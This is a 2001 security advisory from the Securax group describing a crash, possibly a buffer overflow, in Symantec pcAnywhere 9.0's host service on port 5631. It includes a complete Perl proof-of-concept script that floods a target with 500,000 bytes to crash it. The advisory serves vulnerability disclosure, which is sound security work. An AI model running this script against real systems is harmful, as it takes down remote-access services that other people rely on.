============================================================================= Securax-SA-14 Security Advisory belgian.networking.security Dutch ============================================================================= Topic: Symantec pcAnywhere 9.0 DoS / Buffer Overflow Announced: 2001-02-08 Affects: Symantec PcAnywhere 9.0 on Microsoft Windows 98 SE ============================================================================= Note: This entire advisory has been based upon trial and error results. We can not ensure the information below is 100% correct being that we do not have any source code to audit. This document is subject to change without prior notice. If you happen to find more information / problems concerning the below problem or further varients please contact me on the following email incubus@securax.net, or you can contact info@securax.org. I. Problem Description ----------------------- Symantec PcAnywhere is a program that will allow others (who are authorised to have access :)) to use your pc. It's simular to a Windows NT 4.0 terminal server. PcAnywhere (when it's configured to 'be a host pc') listens on 2 ports, 5631 (pcanywheredata, according to nmap) and 65301 (pcanywhere). And when a user sends certain data in a particular way, pcAnywhere will crash. When a large amount (it depends, sometimes the host will go down with 320k characters, sometimes, you will have to send 500k bytes of data) are sent to a 'waiting' host on the pcanywheredata port, "AWHOST32.EXE" will crash, and give an error on the screen, and write the "Unexpected program error" to a logfile. (with EAX, EBX, ... so read them, you'll find the yummy 0x61616161) Oh yeah, don't use uppercase characters, as PcAnywhere won't crash on them. Why no exploit, just a lame Denial of Service? 1.) because I suck in win32 debugging / overflowing (but i'm reading) /* so if I can overflow win32 progs, i'll code an exploit */ 2.) as the amount of data is variable, it's hard to overflow.. The DoS code: <--bof--> #!/usr/bin/perl # Symantec PcAnywhere 9.0 Denial of Service # ----------------------------------------- # by incubus # http://www.hexyn.be # # http://www.securax.net # All my love to Tessa. # Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero, # Zym0tic, segfault, #securax@irc.hexyn.be # Thanks to jurgen swennen, for letting me (ab)use his computer. # # this is intended as proof of concept, do not abuse! use IO::Socket; $host = "$ARGV[0]"; $port = 5631; if ($#ARGV<0) { print "use it like: $0 \n"; exit(); } $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "damn, "; print "hello\n"; $buf = ""; for($counter = 0; $counter < 500000; $counter++) { $buf .= "\x61"; } print $socket "$buf\n"; close($socket); exit(); <--eof--> II. Impact ---------- If someone exploits this, than Symantec is forced to rename the name of this product to PcAnyoneAnywhere or something... No, seriously, this could lead to a compromise of a system. III. possible workarounds ------------------------- This advisory was also sent to Symantec (info@symantec.com), we'll see what they do with it... IV credits ---------- love to Tessa. greetz go out to : f0bic, r00t, Zym0t1c, vorlon, cicer0, tomicron, segfau|t, and so many, many others I forgot... ============================================================================= For more information incubus@securax.org Website http://www.securax.org Advisories/Text http://www.securax.org/pers -----------------------------------------------------------------------------